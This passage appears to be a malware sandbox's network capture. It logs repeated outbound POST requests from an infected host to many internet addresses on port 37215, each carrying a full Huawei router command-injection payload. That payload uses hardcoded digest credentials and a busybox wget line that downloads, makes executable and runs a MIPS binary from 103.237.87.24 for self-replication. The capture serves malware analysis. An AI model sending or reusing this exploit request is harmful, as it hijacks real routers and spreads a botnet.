20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1121192.168.2.1335192169.126.33.1937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433743000 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1122192.168.2.1355522157.44.186.18437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433768988 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1123192.168.2.1345872197.70.195.16637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433773994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1124192.168.2.135550641.22.104.6137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433778048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1125192.168.2.1336218166.39.32.14437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433794975 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1126192.168.2.1351570197.85.220.12537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.435286045 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1127192.168.2.1345588157.66.130.3437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.435288906 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1128192.168.2.1358878157.57.197.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.435293913 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1129192.168.2.1359958147.85.51.1737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.435302019 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1130192.168.2.1342846157.202.39.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.435323000 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1131192.168.2.133418483.171.17.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.435323954 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
